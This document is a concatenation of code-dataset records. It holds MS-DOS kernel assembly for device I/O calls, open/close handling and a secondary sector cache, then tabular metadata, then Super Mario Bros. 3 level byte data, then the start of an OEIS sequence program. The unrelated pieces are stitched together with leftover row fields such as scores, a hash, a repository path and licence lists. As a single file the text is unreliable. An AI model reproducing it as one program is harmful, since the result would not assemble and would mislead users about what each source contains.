i_need DDMOVE,BYTE ;AN000; flag for DWORD move
i_need DOS34_FLAG,WORD ;AN000;
i_need fshare,BYTE ;AN010; share flag
i_need IoStatFail,BYTE ;SR; set if user failed on I24 in IOFUNC
DOSCODE Segment
ASSUME CS:DOSCODE
Public DEV001S, DEV001E ; Pathgen labels
DEV001s:
; length of packets
LenTab DB DRDWRHL, DRDNDHL, DRDWRHL, DSTATHL, DFLSHL, DRDNDHL
; Error Function
CmdTab DB 86h, DEVRD ; 0 input
DB 86h, DEVRDND ; 1 input status
DB 87h, DEVWRT ; 2 output
DB 87h, DEVOST ; 3 output status
DB 86h, DEVIFL ; 4 input flush
DB 86H, DEVRDND ; 5 input status with system WAIT
DEV001E:
ASSUME CS:DOSCODE, SS:DOSDATA
Break <IOFUNC -- DO FUNCTION 1-12 I/O>
;----------------------------------------------------------------------------
;
; Procedure Name : IOFUNC
;
; Inputs:
; DS:SI Points to SFT
; AH is function code
; = 0 Input
; = 1 Input Status
; = 2 Output
; = 3 Output Status
; = 4 Flush
; = 5 Input Status - System WAIT invoked for K09 if no char
; present.
; AL = character if output
; Function:
; Perform indicated I/O to device or file
; Outputs:
; AL is character if input
; If a status call
; zero set if not ready
; zero reset if ready (character in AL for input status)
; For regular files:
; Input Status
; Gets character but restores position
; Zero set on EOF
; Input
; Gets character advances position
; Returns ^Z on EOF
; Output Status
; Always ready
; AX altered, all other registers preserved
;----------------------------------------------------------------------------
procedure IOFUNC,NEAR
Assert ISSFT,<DS,SI>,"IOFUNC"
MOV WORD PTR [IOXAD+2],SS ; SS override for IOXAD, IOSCNT,
; DEVIOBUF
; DEVIOBUF is in DOSDATA
MOV WORD PTR [IOXAD],OFFSET DOSDATA:DEVIOBUF
MOV WORD PTR [IOSCNT],1
MOV WORD PTR [DEVIOBUF],AX
TESTB [SI].SF_FLAGS,sf_isnet
JZ IOTO22 ;AN000;
JMP IOTOFILE ;AN000;
IOTO22:
TESTB [SI].SF_FLAGS,devid_device
JNZ IOTo33 ;AN000;
JMP IOTOFILE ;AN000;
IOTO33:
save_world
MOV DX,DS
MOV BX,SS
MOV DS,BX
MOV ES,BX
ASSUME DS:DOSDATA
XOR BX,BX
cmp ah,5 ; system wait enabled?
jnz no_sys_wait
or bx,0400H ; Set bit 10 in status word for driver
; It is up to device driver to carry out
; appropriate action.
no_sys_wait:
MOV [IOCALL.REQSTAT],BX
XOR BX,BX
MOV BYTE PTR [IOMED],BL
; moved out side this DOSCODE segment.
; Table Segment
; Public DEV001S, DEV001E ; Pathgen labels
; DEV001s:
; ; length of packets
; LenTab DB DRDWRHL, DRDNDHL, DRDWRHL, DSTATHL, DFLSHL, DRDNDHL
;
; ; Error Function
;
; CmdTab DB 86h, DEVRD ; 0 input
; DB 86h, DEVRDND ; 1 input status
; DB 87h, DEVWRT ; 2 output
; DB 87h, DEVOST ; 3 output status
; DB 86h, DEVIFL ; 4 input flush
; DB 86H, DEVRDND ; 5 input status with system WAIT
; DEV001E:
; Table ENDS
MOV BL,AH ; get function
MOV AH,LenTab[BX]
SHL BX,1
MOV CX,WORD PTR CmdTab[BX]
MOV BX,OFFSET DOSDATA:IOCALL; IOCALL is in DOSDATA
MOV [IOCALL.REQLEN],AH
MOV [IOCALL.REQFUNC],CH
IFDEF DBCS ;AN000;
;----------------------------- Start of DBCS 2/13/KK
PUSH CX ;AN000;
MOV CL, [InterCon] ;AN000;
CMP CH, DEVRD ;AN000; 0 input
JZ SETIN ;AN000;
CMP CH, DEVRDND ;AN000; 1(5) input status without(with) system WAIT
JZ SETIN ;AN000;
MOV CL, [SaveCurflg] ;AN000;
CMP CH, DEVWRT ;AN000; 2 output
JZ CHKERROUT ;AN000;
XOR CL,CL ;AN000; else, do normal
SETIN: ;AN000;
MOV BYTE PTR [IoMed], CL ;AN000; set interim I/O indication
POP CX ;AN000;
;----------------------------- End of DBCS 2/13/KK
ENDIF ;AN000;
MOV DS,DX
ASSUME DS:NOTHING
CALL DEVIOCALL
MOV DI,[IOCALL.REQSTAT] ; SS override
.errnz STERR-8000h
and di,di
js DevErr
OkDevIO:
MOV AX,SS
MOV DS,AX
ASSUME DS:DOSDATA
IFDEF DBCS ;AN000;
MOV [InterChar],0 ;AN000; reset interim character flag 2/13/KK
TEST DI,Ddkey ;AN000; is this a dead key (interim char)? 2/13/KK
JZ NotInterim ;AN000; no, flag already reset... 2/13/KK
INC [InterChar] ;AN000; yes, set flag for future 2/13/KK
NotInterim: ;AN000; 2/13/KK
ENDIF ;AN000;
CMP CH,DEVRDND
JNZ DNODRD
MOV AL,BYTE PTR [IORCHR]
MOV [DEVIOBUF],AL
DNODRD: MOV AH,BYTE PTR [IOCALL.REQSTAT+1]
NOT AH ; Zero = busy, not zero = ready
AND AH,STBUI SHR 8
QuickReturn: ;AN000; 2/13/KK
restore_world
ASSUME DS:NOTHING
; SR;
; We return ax = -1 if the user failed on I24. This is the case if
; IoStatFail = -1 (set after return from the I24)
;
pushf
mov al,ss:IoStatFail ;assume fail error
cbw ;sign extend to word
cmp ax,-1
jne not_fail_ret
inc ss:IoStatFail
popf
ret
not_fail_ret:
MOV AX,WORD PTR [DEVIOBUF] ;ss override
popf
return
;IOTOFILEJ:
; JMP SHORT IOTOFILE
IFDEF DBCS ;AN000;
;------------------------------ Start of DBCS 2/13/KK
CHKERROUT: ;AN000;
MOV DS, DX ;AN000;
TESTB [SI].SF_FLAGS, devid_device_con_out ;AN000; output to console ?
JNZ GOOD ;AN000; yes
CMP CL, 01 ;AN000; write interim ?
JNZ GOOD ;AN000; no,
POP CX ;AN000;
JMP SHORT QuickReturn ;AN000; avoid writting interims to other than
;AN000; console device
GOOD: ;AN000;
PUSH SS ;AN000;
POP DS ;AN000;
JMP SETIN ;AN000;
;------------------------------ End of DBCS 2/13/KK
ENDIF ;AN000;
DevErr:
MOV AH,CL
invoke CHARHARD
CMP AL,1
JNZ NO_RETRY
restore_world ;hkn; use macro
JMP IOFUNC
NO_RETRY:
;
; Know user must have wanted Ignore OR Fail. Make sure device shows ready
; ready so that DOS doesn't get caught in a status loop when user
; simply wants to ignore the error.
;
; SR; If fail wanted by user set ax to special value (ax = -1). This
; should be checked by the caller on return
;
; SS override
AND BYTE PTR [IOCALL.REQSTAT+1], NOT (STBUI SHR 8)
; SR;
; Check if user failed
;
cmp al,3
jnz not_fail
dec IoStatFail ;set flag indicating fail on I24
not_fail:
JMP OKDevIO
IOTOFILE:
ASSUME DS:NOTHING
OR AH,AH
JZ IOIN
DEC AH
JZ IOIST
DEC AH
JZ IOUT
return ; NON ZERO FLAG FOR OUTPUT STATUS
IOIST:
PUSH WORD PTR [SI.sf_position] ; Save position
PUSH WORD PTR [SI.sf_position+2]
CALL IOIN
POP WORD PTR [SI.sf_position+2] ; Restore position
POP WORD PTR [SI.sf_position]
return
IOUT:
CALL SETXADDR
invoke DOS_WRITE
CALL RESTXADDR ; If you change this into a jmp don't
return ; come crying to me when things don't
; work ARR
IOIN:
CALL SETXADDR
; SS override for DOS34_FLAG
OR [DOS34_FLAG],Disable_EOF_I24 ;AN000;
invoke DOS_READ
AND [DOS34_FLAG],NO_Disable_EOF_I24 ;AN000;
OR CX,CX ; Check EOF
CALL RESTXADDR
; SS override
MOV AL,[DEVIOBUF] ; Get byte from trans addr
retnz
MOV AL,1AH ; ^Z if no bytes
return
SETXADDR:
; SS override
POP WORD PTR [CALLSCNT] ; Return address
save_world ;hkn; use macro
; SS override for DMAADD and THISSFT
PUSH WORD PTR [DMAADD] ; Save Disk trans addr
PUSH WORD PTR [DMAADD+2]
MOV WORD PTR [THISSFT+2],DS
Context DS
MOV WORD PTR [THISSFT],SI ; Finish setting SFT pointer
MOV CX,WORD PTR [IOXAD+2]
MOV WORD PTR [DMAADD+2],CX
MOV CX,WORD PTR [IOXAD]
MOV WORD PTR [DMAADD],CX ; Set byte trans addr
MOV CX,[IOSCNT] ; ioscnt specifies length of buffer
JMP SHORT RESTRET ; RETURN ADDRESS
RESTXADDR:
DOSAssume <DS>,"RestXAddr"
POP WORD PTR [CALLSCNT] ; Return address
POP WORD PTR [DMAADD+2] ; Restore Disk trans addr
POP WORD PTR [DMAADD]
restore_world ; use macro
ASSUME DS:NOTHING
; SS override
RESTRET:JMP WORD PTR [CALLSCNT] ; Return address
EndProc IOFUNC
Break <DEV_OPEN_SFT, DEV_CLOSE_SFT - OPEN or CLOSE A DEVICE>
;** Dev_Open_SFT - Open the Device for an SFT
;
; Dev_Open_SFT issues an open call to the device associated with
; the SFT.
;
; ENTRY (ES:DI) = SFT
; EXIT none
; USES all
procedure DEV_OPEN_SFT,NEAR
Assert ISSFT,<ES,DI>,"Dev_Open_SFT"
Save_World ; use macro
MOV AL,DEVOPN
JMP SHORT DO_OPCLS
EndProc DEV_OPEN_SFT
;---------------------------------------------------------------------------
;
; Procedure Name : DEV_CLOSE_SFT
;
; Inputs:
; ES:DI Points to SFT
; Function:
; Issue a CLOSE call to the correct device
; Outputs:
; None
; ALL preserved
;
;---------------------------------------------------------------------------
procedure DEV_CLOSE_SFT,NEAR
Assert ISSFT,<ES,DI>,"Dev_Close_SFT"
Save_World ; use macro
MOV AL,DEVCLS
;
; Main entry for device open and close. AL contains the function
; requested. Subtlety: if Sharing is NOT loaded then we do NOT issue
; open/close to block devices. This allows networks to function but
; does NOT hang up with bogus change-line code.
;
entry DO_OPCLS
; Is the SFT for the net? If so, no action necessary.
TESTB es:[di].sf_Flags, SF_ISNET
JNZ OPCLS_DONE ; NOP on net SFTs
XOR AH,AH ; Unit
TESTB ES:[DI].SF_FLAGS,devid_device
LES DI,ES:[DI.sf_devptr] ; Get DPB or device
JNZ Got_Dev_Addr
; We are about to call device open/close on a block driver. If no
; sharing then just short circuit to done.
;;;;; invoke CheckShare
; SS override
CMP fshare,1 ;AN010; /NC or no SHARE
JBE opCLs_Done ;AN010; yes
MOV AH,ES:[DI.dpb_UNIT] ; (ah) = unit
MOV CL,ES:[DI.dpb_drive] ; (cl) = drive
LES DI,ES:[DI.dpb_driver_addr] ; Get device
GOT_DEV_ADDR: ; ES:DI -> device
TESTB ES:[DI.SDEVATT],DEVOPCL
JZ OPCLS_DONE ; Device can't
PUSH ES
POP DS
MOV SI,DI ; DS:SI -> device
OPCLS_RETRY:
Context ES
; DEVCALL is in DOSDATA
MOV DI,OFFSET DOSDATA:DEVCALL
MOV BX,DI
PUSH AX
MOV AL,DOPCLHL
STOSB ; Length
POP AX
XCHG AH,AL
STOSB ; Unit
XCHG AH,AL
STOSB ; Command
MOV WORD PTR ES:[DI],0 ; Status
PUSH AX ; Save Unit,Command
invoke DEVIOCALL2
MOV DI,ES:[BX.REQSTAT]
.errnz STERR-8000h
and di,di
Jns OPCLS_DONEP ; No error
TESTB [SI.SDEVATT],DEVTYP
JZ BLKDEV
MOV AH,86H ; Read error in data, Char dev
JMP SHORT HRDERR
BLKDEV:
MOV AL,CL ; Drive # in AL
MOV AH,6 ; Read error in data, Blk dev
HRDERR:
invoke CHARHARD
CMP AL,1
JNZ OPCLS_DONEP ; IGNORE or FAIL
; Note that FAIL is essentually IGNORED
POP AX ; Get back Unit, Command
JMP OPCLS_RETRY
OPCLS_DONEP:
POP AX ; Clean stack
OPCLS_DONE:
Restore_World ;hkn; use macro
return
EndProc DEV_CLOSE_SFT
Break <DEVIOCALL, DEVIOCALL2 - CALL A DEVICE>
;** DevIoCall - Call Device
;
; ENTRY DS:SI Points to device SFT
; ES:BX Points to request data
; EXIT DS:SI -> Device driver
; USES DS:SI,AX
;** DevIoCall2 - Call Device
;
; ENTRY DS:SI Points to DPB
; ES:BX Points to request data
; EXIT DS:SI -> Device driver
; USES DS:SI,AX
procedure DEVIOCALL,NEAR
; SS override for CALLSSEC,
; CALLNEWSC, HIGH_SECTOR & CALLDEVAD
Assert ISSFT,<DS,SI>,"DevIOCall"
LDS SI,[SI.sf_devptr]
entry DEVIOCALL2
EnterCrit critDevice
TESTB [SI.SDEVATT],DevTyp ;AN000; >32mb block device ?
JNZ chardev2 ;AN000; >32mb no
CMP ES:[BX.REQFUNC],DEVRD ;AN000; >32mb read ?
JZ chkext ;AN000; >32mb yes
CMP ES:[BX.REQFUNC],DEVWRT ;AN000; >32mb write ?
JZ chkext ;AN000; >32mb yes
CMP ES:[BX.REQFUNC],DEVWRTV;AN000; >32mb write/verify ?
JNZ chardev2 ;AN000; >32mb no
chkext:
CALL RW_SC ;AN000;LB. use secondary cache if there
JC dev_exit ;AN000;LB. done
TESTB [SI.SDEVATT],EXTDRVR ;AN000;>32mb extended driver?
JZ chksector ;AN000;>32mb no
ADD BYTE PTR ES:[BX],8 ;AN000;>32mb make length to 30
MOV AX,[CALLSSEC] ;AN000;>32mb
MOV [CALLSSEC],-1 ;AN000;>32mb old sector =-1
MOV WORD PTR [CALLNEWSC],AX ;AN000;>32mb new sector =
MOV AX,[HIGH_SECTOR] ;AN000; >32mb low sector,high sector
MOV WORD PTR [CALLNEWSC+2],AX ;AN000; >32mb
JMP short chardev2 ;AN000; >32mb
chksector: ;AN000; >32mb
CMP [HIGH_SECTOR],0 ;AN000; >32mb if >32mb
JZ chardev2 ;AN000; >32mb then fake error
MOV ES:[BX.REQSTAT],STERR+STDON+ERROR_I24_NOT_DOS_DISK ;AN000; >32mb
JMP SHORT dev_exit ;AN000; >32mb
chardev2: ;AN000;
;
; As above only DS:SI points to device header on entry, and DS:SI is
; preserved
;
MOV AX,[SI.SDEVSTRAT]
MOV WORD PTR [CALLDEVAD],AX
MOV WORD PTR [CALLDEVAD+2],DS
CALL DWORD PTR [CALLDEVAD]
MOV AX,[SI.SDEVINT]
MOV WORD PTR [CALLDEVAD],AX
CALL DWORD PTR [CALLDEVAD]
CALL VIRREAD ;AN000;LB. move data from SC to buffer
JC chardev2 ;AN000;LB. bad sector or exceeds max sec
dev_exit:
LeaveCrit critDevice
return
EndProc DEVIOCALL
Break <SETREAD, SETWRITE -- SET UP HEADER BLOCK>
;---------------------------------------------------------------------------
;
; Procedure Name : SETREAD, SETWRITE
;
; Inputs:
; DS:BX = Transfer Address
; CX = Record Count
; DX = Starting Record
; AH = Media Byte
; AL = Unit Code
; Function:
; Set up the device call header at DEVCALL
; Output:
; ES:BX Points to DEVCALL
; No other registers effected
;
;---------------------------------------------------------------------------
procedure SETREAD,NEAR
PUSH DI
PUSH CX
PUSH AX
MOV CL,DEVRD
SETCALLHEAD:
MOV AL,DRDWRHL
PUSH SS
POP ES
; DEVCALL is in DOSDATA
MOV DI,OFFSET DOSDATA:DEVCALL
STOSB ; length
POP AX
STOSB ; Unit
PUSH AX
MOV AL,CL
STOSB ; Command code
XOR AX,AX
STOSW ; Status
ADD DI,8 ; Skip link fields
POP AX
XCHG AH,AL
STOSB ; Media byte
XCHG AL,AH
PUSH AX
MOV AX,BX
STOSW
MOV AX,DS
STOSW ; Transfer addr
POP CX ; Real AX
POP AX ; Real CX
STOSW ; Count
XCHG AX,DX ; AX=Real DX, DX=real CX, CX=real AX
STOSW ; Start
XCHG AX,CX
XCHG DX,CX
POP DI
; DEVCALL is in DOSDATA
MOV BX,OFFSET DOSDATA:DEVCALL
return
entry SETWRITE
ASSUME DS:NOTHING,ES:NOTHING
; Inputs:
; DS:BX = Transfer Address
; CX = Record Count
; DX = Starting Record
; AH = Media Byte
; AL = Unit Code
; Function:
; Set up the device call header at DEVCALL
; Output:
; ES:BX Points to DEVCALL
; No other registers effected
PUSH DI
PUSH CX
PUSH AX
MOV CL,DEVWRT
ADD CL,[VERFLG] ; SS override
JMP SHORT SETCALLHEAD
EndProc SETREAD
Break <RW_SC -- Read Write Secondary Cache>
;---------------------------------------------------------------------------
;
; Procedure Name : RW_SC
;
; Inputs:
; [SC_CACHE_COUNT]= secondary cache count
; [SC_STATUS]= SC validity status
; [SEQ_SECTOR]= last sector read
; Function:
; Read from or write through secondary cache
; Output:
; ES:BX Points to DEVCALL
; carry clear, I/O is not done
; [SC_FLAG]=1 if continuos sectors will be read
; carry set, I/O is done
;
;----------------------------------------------------------------------------
procedure RW_SC,NEAR ;AN000;
; SS override for all variables used.
CMP [SC_CACHE_COUNT],0 ;AN000;LB. secondary cache exists?
JZ scexit4 ;AN000;LB. no, do nothing
CMP [CALLSCNT],1 ;AN000;LB. sector count = 1 (buffer I/O)
JNZ scexit4 ;AN000;LB. no, do nothing
PUSH CX ;AN000;;LB.
PUSH DX ;AN000;;LB. yes
PUSH DS ;AN000;;LB. save registers
PUSH SI ;AN000;;LB.
PUSH ES ;AN000;;LB.
PUSH DI ;AN000;;LB.
MOV DX,WORD PTR [CALLSSEC] ;AN000;;LB. starting sector
CMP BYTE PTR [DEVCALL.REQFUNC],DEVRD ;AN000;LB. read ? ;AN000;
JZ doread ;AN000;LB. yes ;AN000;
CALL INVALIDATE_SC ;AN000;LB. invalidate SC ;AN000;
JMP scexit2 ;AN000;LB. back to normal ;AN000;
scexit4: ;AN000; ;AN000;
CLC ;AN000;LB. I/O not done yet ;AN000;
return ;AN000;LB. ;AN000;
doread: ;AN000; ;AN000;
CALL SC2BUF ;AN000;LB. check if in SC ;AN000;
JC readSC ;AN000;LB. ;AN000;
MOV [DEVCALL.REQSTAT],STDON ;AN000;LB. fake done and ok ;AN000;
STC ;AN000;LB. set carry ;AN000;
JMP short saveseq ;AN000;LB. save seq. sector # ;AN000;
readSC: ;AN000;
MOV AX,WORD PTR [HIGH_SECTOR] ;AN000;;LB. subtract sector num from
MOV CX,WORD PTR [CALLSSEC] ;AN000;;LB. saved sequential sector
SUB CX,WORD PTR [SEQ_SECTOR] ;AN000;;LB. number
SBB AX,WORD PTR [SEQ_SECTOR+2] ;AN000;;LB.
CMP AX,0 ;AN000;;LB. greater than 64K
JNZ saveseq2 ;AN000;;LB. yes,save seq. sector #
chklow: ;AN000;
CMP CX,1 ;AN000;;LB. <= 1
JA saveseq2 ;AN000;;LB. no, not sequential
MOV [SC_STATUS],-1 ;AN000;;LB. prsume all SC valid
MOV AX,[SC_CACHE_COUNT] ;AN000;;LB. yes, sequential
MOV [CALLSCNT],AX ;AN000;;LB. read continuous sectors
readsr:
MOV AX,WORD PTR [CALLXAD+2] ;AN000;;LB. save buffer addr
MOV [TEMP_VAR2],AX ;AN000;;LB. in temp vars
MOV AX,WORD PTR [CALLXAD] ;AN000;;LB.
MOV [TEMP_VAR],AX ;AN000;;LB.
;AN000;
MOV AX,WORD PTR [SC_CACHE_PTR] ;AN000;LB. use SC cache addr as ;AN000;
MOV WORD PTR [CALLXAD],AX ;AN000;LB. transfer addr ;AN000;
MOV AX,WORD PTR [SC_CACHE_PTR+2] ;AN000;LB. ;AN000;
MOV WORD PTR [CALLXAD+2],AX ;AN000;LB. ;AN000;
MOV [SC_FLAG],1 ;AN000;LB. flag it for later ;AN000;
MOV AL,[SC_DRIVE] ;AN000;;LB. current drive
MOV [CURSC_DRIVE],AL ;AN000;;LB. set current drive
MOV AX,WORD PTR [CALLSSEC] ;AN000;;LB. current sector
MOV [CURSC_SECTOR],AX ;AN000;;LB. set current sector
MOV AX,WORD PTR [HIGH_SECTOR] ;AN000;;LB.
MOV [CURSC_SECTOR+2],AX ;AN000;;LB.
saveseq2: ;AN000;
CLC ;AN000;LB. clear carry ;AN000;
saveseq: ;AN000; ;AN000;
MOV AX,[HIGH_SECTOR] ;AN000;LB. save current sector # ;AN000;
MOV WORD PTR [SEQ_SECTOR+2],AX ;AN000;LB. for access mode ref. ;AN000;
MOV AX,[CALLSSEC] ;AN000;LB. ;AN000;
MOV WORD PTR [SEQ_SECTOR],AX ;AN000;LB. ;AN000;
JMP short scexit ;AN000;LB. ;AN000;
;AN000;
scexit2: ;AN000;LB. ;AN000;
CLC ;AN000;LB. clear carry ;AN000;
scexit: ;AN000; ;AN000;
POP DI ;AN000;;LB.
POP ES ;AN000;;LB. restore registers
POP SI ;AN000;;LB.
POP DS ;AN000;;LB.
POP DX ;AN000;;LB.
POP CX ;AN000;;LB.
return ;AN000;;LB.
;AN000;
EndProc RW_SC ;AN000;
Break <IN_SC -- check if in secondary cache>
;--------------------------------------------------------------------------
;
; Procedure Name : IN_SC
;
; Inputs: [SC_DRIVE]= requesting drive
; [CURSC_DRIVE]= current SC drive
; [CURSC_SECTOR] = starting scetor # of SC
; [SC_CACHE_COUNT] = SC count
; [HIGH_SECTOR]:DX= sector number
; Function:
; Check if the sector is in secondary cache
; Output:
; carry clear, in SC
; CX= the index in the secondary cache
; carry set, not in SC
;
;---------------------------------------------------------------------------
procedure IN_SC,NEAR ;AN000;
; SS override for all variables used
MOV AL,[SC_DRIVE] ;AN000;;LB. current drive
CMP AL,[CURSC_DRIVE] ;AN000;;LB. same as SC drive
JNZ outrange2 ;AN000;;LB. no
MOV AX,WORD PTR [HIGH_SECTOR] ;AN000;;LB. subtract sector num from
MOV CX,DX ;AN000;;LB. secondary starting sector
SUB CX,WORD PTR [CURSC_SECTOR] ;AN000;;LB. number
SBB AX,WORD PTR [CURSC_SECTOR+2] ;AN000;;LB.
CMP AX,0 ;AN000;;LB. greater than 64K
JNZ outrange2 ;AN000;;LB. yes
CMP CX,[SC_CACHE_COUNT] ;AN000;;LB. greater than SC count
JAE outrange2 ;AN000;;LB. yes
CLC ;AN000;;LB. clear carry
JMP short inexit ;AN000;;LB. in SC
outrange2: ;AN000;;LB. set carry
STC ;AN000;;LB.
inexit: ;AN000;;LB.
return ;AN000;;LB.
EndProc IN_SC ;AN000;
Break <INVALIDATE_SC - invalide secondary cache>
;---------------------------------------------------------------------------
;
; Procedure Name : Invalidate_Sc
;
; Inputs: [SC_DRIVE]= requesting drive
; [CURSC_DRIVE]= current SC drive
; [CURSC_SECTOR] = starting scetor # of SC
; [SC_CACHE_COUNT] = SC count
; [SC_STAUS] = SC status word
; [HIGH_SECTOR]:DX= sceotor number
;
; Function:
; invalidate secondary cache if in there
; Output:
; [SC_STATUS] is updated
;---------------------------------------------------------------------------
procedure INVALIDATE_SC,NEAR ;AN000;
; SS override for all variables used
CALL IN_SC ;AN000;;LB. in secondary cache
JC outrange ;AN000;;LB. no
MOV AX,1 ;AN000;;LB. invalidate the sector
SHL AX,CL ;AN000;;LB. in the secondary cache
NOT AX ;AN000;;LB.
AND [SC_STATUS],AX ;AN000;;LB. save the status
outrange: ;AN000;;LB.
return ;AN000;;LB.
EndProc INVALIDATE_SC ;AN000;
Break <VIRREAD- virtually read data into buffer>
;--------------------------------------------------------------------------
;
; Procedure Name : SC_FLAG
;
; Inputs: SC_FLAG = 0 , no sectors were read into SC
; 1, continous sectors were read into SC
; Function:
; Move data from SC to buffer
; Output:
; carry clear, data is moved to buffer
; carry set, bad sector or exceeds maximum sector
; SC_FLAG =0
; CALLSCNT=1
; SC_STATUS= -1 if succeeded
;
; 0 if failed
;--------------------------------------------------------------------------
procedure VIRREAD,NEAR ;AN000;
; SS override for all variables used
CMP [SC_FLAG],0 ;AN000;;LB. from SC fill
JZ sc2end ;AN000;;LB. no
MOV AX,[TEMP_VAR2] ;AN000;;LB. restore buffer addr
MOV WORD PTR [CALLXAD+2],AX ;AN000;;LB.
MOV AX,[TEMP_VAR] ;AN000;;LB.
MOV WORD PTR [CALLXAD],AX ;AN000;;LB.
MOV [SC_FLAG],0 ;AN000;;LB. reset sc_flag
MOV [CALLSCNT],1 ;AN000;;LB. one sector transferred
TESTB [DEVCALL.REQSTAT],STERR ;AN000;;LB. error?
JNZ scerror ;AN000;;LB. yes
PUSH DS ;AN000;;LB.
PUSH SI ;AN000;;LB.
PUSH ES ;AN000;;LB.
PUSH DI ;AN000;;LB.
PUSH DX ;AN000;;LB.
PUSH CX ;AN000;;LB.
XOR CX,CX ;AN000;;LB. we want first sector in SC
CALL SC2BUF2 ;AN000;;LB. move data from SC to buffer
POP CX ;AN000;;LB.
POP DX ;AN000;;LB.
POP DI ;AN000;;LB.
POP ES ;AN000;;LB.
POP SI ;AN000;;LB.
POP DS ;AN000;;LB.
JMP SHORT sc2end ;AN000;;LB. return
scerror: ;AN000;
MOV [CALLSCNT],1 ;AN000;;LB. reset sector count to 1
MOV [SC_STATUS],0 ;AN000;;LB. invalidate all SC sectors
MOV [CURSC_DRIVE],-1 ;AN000;;LB. invalidate drive
STC ;AN000;;LB. carry set
return ;AN000;;LB.
sc2end: ;AN000;
CLC ;AN000;;LB. carry clear
return ;AN000;;LB.
EndProc VIRREAD ;AN000;
Break <SC2BUF- move data from SC to buffer>
;----------------------------------------------------------------------------
;
; Procedure Name : SC2BUF
;
; Inputs: [SC_STATUS] = SC validity status
; [SC_SECTOR_SIZE] = request sector size
; [SC_CACHE_PTR] = pointer to SC
; Function:
; Move data from SC to buffer
; Output:
; carry clear, in SC and data is moved
; carry set, not in SC and data is not moved
;---------------------------------------------------------------------------
procedure SC2BUF,NEAR ;AN000;
; SS override for all variables used
CALL IN_SC ;AN000;;LB. in secondary cache
JC noSC ;AN000;;LB. no
MOV AX,1 ;AN000;;LB. check if valid sector
SHL AX,CL ;AN000;;LB. in the secondary cache
TEST [SC_STATUS],AX ;AN000;;LB.
JZ noSC ;AN000;;LB. invalid
entry SC2BUF2 ;AN000;
MOV AX,CX ;AN000;;LB. times index with
MUL [SC_SECTOR_SIZE] ;AN000;;LB. sector size
ADD AX,WORD PTR [SC_CACHE_PTR] ;AN000;;LB. add SC starting addr
ADC DX,WORD PTR [SC_CACHE_PTR+2];AN000;;LB.
MOV DS,DX ;AN000; ;LB. DS:SI-> SC sector addr
MOV SI,AX ;AN000; ;LB.
MOV ES,WORD PTR [CALLXAD+2] ;AN000; ;LB. ES:DI-> buffer addr
MOV DI,WORD PTR [CALLXAD] ;AN000; ;LB.
MOV CX,[SC_SECTOR_SIZE] ;AN000; ;LB. count= sector size
SHR CX,1 ;AN000; ;LB. may use DWORD move for 386
entry MOVWORDS ;AN000;
CMP [DDMOVE],0 ;AN000; ;LB. 386 ?
JZ nodd ;AN000; ;LB. no
SHR CX,1 ;AN000; ;LB. words/2
DB 66H ;AN000; ;LB. use double word move
nodd:
REP MOVSW ;AN000; ;LB. move to buffer
CLC ;AN000; ;LB. clear carry
return ;AN000; ;LB. exit
noSC: ;AN000;
STC ;AN000; ;LB. set carry
sexit: ;AN000;
return ;AN000; ;LB.
EndProc SC2BUF
DOSCODE ENDS
END
| 26.533673 | 85 | 0.624236 |
170beb2ba0732bc68db223ec335da865afcaa4c4 | 1,545 | asm | Assembly | PRG/levels/Giant/4-2.asm | narfman0/smb3_pp1 | 38a58adafff67a403591e38875e9fae943a5fe76 | [
"Unlicense"
] | null | null | null | PRG/levels/Giant/4-2.asm | narfman0/smb3_pp1 | 38a58adafff67a403591e38875e9fae943a5fe76 | [
"Unlicense"
] | null | null | null | PRG/levels/Giant/4-2.asm | narfman0/smb3_pp1 | 38a58adafff67a403591e38875e9fae943a5fe76 | [
"Unlicense"
] | null | null | null | ; Original address was $B067
; 4-2
.word W504_EndL ; Alternate level layout
.word W504_EndO ; Alternate object layout
.byte LEVEL1_SIZE_08 | LEVEL1_YSTART_140
.byte LEVEL2_BGPAL_00 | LEVEL2_OBJPAL_08 | LEVEL2_XSTART_18 | LEVEL2_UNUSEDFLAG
.byte LEVEL3_TILESET_11 | LEVEL3_VSCROLL_LOCKLOW | LEVEL3_PIPENOTEXIT
.byte LEVEL4_BGBANK_INDEX(11) | LEVEL4_INITACT_NOTHING
.byte LEVEL5_BGM_ATHLETIC | LEVEL5_TIME_300
.byte $17, $00, $62, $15, $08, $83, $16, $10, $82, $17, $16, $81, $16, $1B, $82, $14
.byte $21, $84, $15, $28, $40, $17, $28, $60, $16, $2D, $82, $53, $21, $E2, $55, $2A
.byte $42, $11, $30, $10, $55, $30, $47, $17, $38, $60, $14, $3C, $84, $35, $43, $40
.byte $36, $43, $40, $37, $43, $40, $38, $43, $40, $32, $44, $10, $33, $44, $10, $34
.byte $44, $10, $35, $44, $10, $36, $44, $10, $37, $44, $10, $38, $44, $10, $56, $45
.byte $08, $37, $45, $40, $38, $45, $40, $55, $4A, $45, $31, $4A, $02, $32, $4A, $13
.byte $16, $47, $84, $14, $50, $84, $55, $53, $45, $55, $5C, $46, $33, $54, $13, $32
.byte $5E, $12, $16, $59, $82, $32, $58, $80, $33, $58, $80, $34, $58, $80, $32, $62
.byte $80, $33, $62, $80, $34, $62, $80, $10, $65, $10, $55, $66, $47, $16, $63, $82
.byte $13, $6E, $60, $15, $6E, $60, $17, $6E, $60, $34, $70, $44, $15, $7A, $61, $73
.byte $7B, $62, $01, $7E, $60, $03, $7E, $60, $05, $7E, $60, $07, $7E, $60, $09, $7E
.byte $60, $0B, $7E, $60, $0D, $7E, $60, $0F, $7E, $60, $11, $7E, $60, $13, $7E, $60
.byte $15, $7E, $60, $17, $7E, $60, $19, $7E, $60, $59, $00, $81, $80, $E7, $73, $20
.byte $FF
| 61.8 | 85 | 0.526861 |
c189b68749d17c8acd05d58a311a1d1f6d33c799 | 347 | asm | Assembly | programs/oeis/267/A267942.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 22 | 2018-02-06T19:19:31.000Z | 2022-01-17T21:53:31.000Z | programs/oeis/267/A267942.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 41 | 2021-02-22T19:00:34.000Z | 2021-08-28T10:47:47.000Z | programs/oeis/267/A267942.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 5 | 2021-02-24T21:14:16.000Z | 2021-08-09T19:48:05.000Z | ; A267942: Interleave (n-1)^2 + 2 and (n+1)^2 + 2.
